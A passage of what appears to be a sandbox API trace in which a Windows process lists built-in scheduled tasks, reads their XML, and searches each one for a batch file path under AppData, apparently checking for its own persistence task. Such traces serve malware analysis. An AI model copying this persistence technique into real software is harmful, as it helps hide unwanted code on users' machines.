$(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n \\Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT10M\r\n P365D\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n") returned 0x0 [0162.321] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n \\Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT10M\r\n P365D\r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.321] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.321] IUnknown:Release (This=0x929460) returned 0x0 [0162.321] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.321] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.321] IUnknown:Release (This=0x929460) returned 0x0 [0162.321] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.321] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.321] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.322] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.322] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.322] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="UninstallDeviceTask") returned 0x0 [0162.322] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n \\Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0162.322] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n \\Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.323] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.323] IUnknown:Release (This=0x929470) returned 0x0 [0162.323] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.323] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.323] IUnknown:Release (This=0x929470) returned 0x0 [0162.323] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.323] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.323] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929490) returned 0x0 [0162.324] IRegisteredTaskCollection:get_Count (in: This=0x929490, pCount=0xce048 | out: pCount=0xce048*=6) returned 0x0 [0162.324] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.324] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="AikCertEnrollTask") returned 0x0 [0162.324] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-103)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\AikCertEnrollTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7510BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n") returned 0x0 [0162.325] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-103)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\AikCertEnrollTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7510BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.325] IUnknown:Release (This=0x929630) returned 0x0 [0162.325] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.325] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="CryptoPolicyTask") returned 0x0 [0162.325] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-104)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\CryptoPolicyTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7530BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n") returned 0x0 [0162.326] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-104)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\CryptoPolicyTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7530BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.326] IUnknown:Release (This=0x929630) returned 0x0 [0162.326] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.326] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="KeyPreGenTask") returned 0x0 [0162.326] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\KeyPreGenTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA323098541\r\n \r\n \r\n PT10M\r\n 7520BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n") returned 0x0 [0162.327] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;NS)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-101)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-100)\r\n $(@%SystemRoot%\\system32\\ngctasks.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\KeyPreGenTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA323098541\r\n \r\n \r\n PT10M\r\n 7520BCA323098541\r\n \r\n \r\n \r\n \r\n {47E30D54-DAC1-473A-AFF7-2355BF78881F}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.327] IUnknown:Release (This=0x929630) returned 0x0 [0162.327] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.327] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="SystemTask") returned 0x0 [0162.327] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n") returned 0x0 [0162.328] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.328] IUnknown:Release (This=0x929630) returned 0x0 [0162.328] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.328] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="UserTask") returned 0x0 [0162.328] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n F510BCA32A1E890D\r\n \r\n \r\n \r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n") returned 0x0 [0162.329] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n F510BCA32A1E890D\r\n \r\n \r\n \r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.329] IUnknown:Release (This=0x929630) returned 0x0 [0162.329] IRegisteredTaskCollection:get_Item (in: This=0x929490, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929630) returned 0x0 [0162.329] IRegisteredTask:get_Name (in: This=0x929630, pName=0xce058 | out: pName=0xce058*="UserTask-Roam") returned 0x0 [0162.329] IRegisteredTask:get_Xml (in: This=0x929630, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n") returned 0x0 [0162.330] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n PT0S\r\n Parallel\r\n \r\n 5\r\n PT1M\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n {58FB76B9-AC85-4E55-AC04-427593B1D060}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.330] IUnknown:Release (This=0x929630) returned 0x0 [0162.330] IUnknown:Release (This=0x929490) returned 0x0 [0162.330] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929490) returned 0x0 [0162.331] ITaskFolderCollection:get_Count (in: This=0x929490, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.331] IUnknown:Release (This=0x929490) returned 0x0 [0162.331] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.331] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.331] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.331] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.331] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.331] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="ProactiveScan") returned 0x0 [0162.331] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\pstask.dll,-100)\r\n $(@%systemroot%\\system32\\pstask.dll,-101)\r\n $(@%systemroot%\\system32\\pstask.dll,-102)\r\n \\Microsoft\\Windows\\Chkdsk\\ProactiveScan\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {CF4270F5-2E43-4468-83B3-A8C45BB33EA1}\r\n \r\n \r\n") returned 0x0 [0162.332] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FR;;;AU)\r\n $(@%systemroot%\\system32\\pstask.dll,-100)\r\n $(@%systemroot%\\system32\\pstask.dll,-101)\r\n $(@%systemroot%\\system32\\pstask.dll,-102)\r\n \\Microsoft\\Windows\\Chkdsk\\ProactiveScan\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n \r\n \r\n \r\n \r\n \r\n {CF4270F5-2E43-4468-83B3-A8C45BB33EA1}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.332] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.332] IUnknown:Release (This=0x929460) returned 0x0 [0162.332] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.332] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.332] IUnknown:Release (This=0x929460) returned 0x0 [0162.332] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.332] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.333] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.333] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.333] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.333] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="License Validation") returned 0x0 [0162.333] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2014-01-01T00:00:00\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)(A;;FA;;;S-1-5-80-65843127-2189646064-2697706863-2125155322-3141006483)(A;;FR;;;S-1-5-87-1452649159-2109950929-2856838567-3638795029-1283063528)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-102)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-100)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-101)\r\n \\Microsoft\\Windows\\Clip\\License Validation\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\system32\\ClipUp.exe\r\n -p -s -o\r\n \r\n \r\n") returned 0x0 [0162.334] StrStrIW (lpFirst="\r\n\r\n \r\n 2014-01-01T00:00:00\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)(A;;FA;;;S-1-5-80-65843127-2189646064-2697706863-2125155322-3141006483)(A;;FR;;;S-1-5-87-1452649159-2109950929-2856838567-3638795029-1283063528)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-102)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-100)\r\n $(@%SystemRoot%\\system32\\ClipUp.exe,-101)\r\n \\Microsoft\\Windows\\Clip\\License Validation\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\system32\\ClipUp.exe\r\n -p -s -o\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.334] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.334] IUnknown:Release (This=0x929460) returned 0x0 [0162.334] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.334] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.334] IUnknown:Release (This=0x929460) returned 0x0 [0162.334] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.334] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.335] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.335] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.335] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.335] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="CreateObjectTask") returned 0x0 [0162.335] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n \\Microsoft\\Windows\\CloudExperienceHost\\CreateObjectTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT30S\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {E4544ABA-62BF-4C54-AAB2-EC246342626C}\r\n \r\n \r\n") returned 0x0 [0162.336] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;SY)(A;;FRFX;;;IU)\r\n \\Microsoft\\Windows\\CloudExperienceHost\\CreateObjectTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT30S\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {E4544ABA-62BF-4C54-AAB2-EC246342626C}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.336] IUnknown:Release (This=0x929610) returned 0x0 [0162.336] IUnknown:Release (This=0x929480) returned 0x0 [0162.336] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.336] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.336] IUnknown:Release (This=0x929480) returned 0x0 [0162.336] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.336] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.336] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: 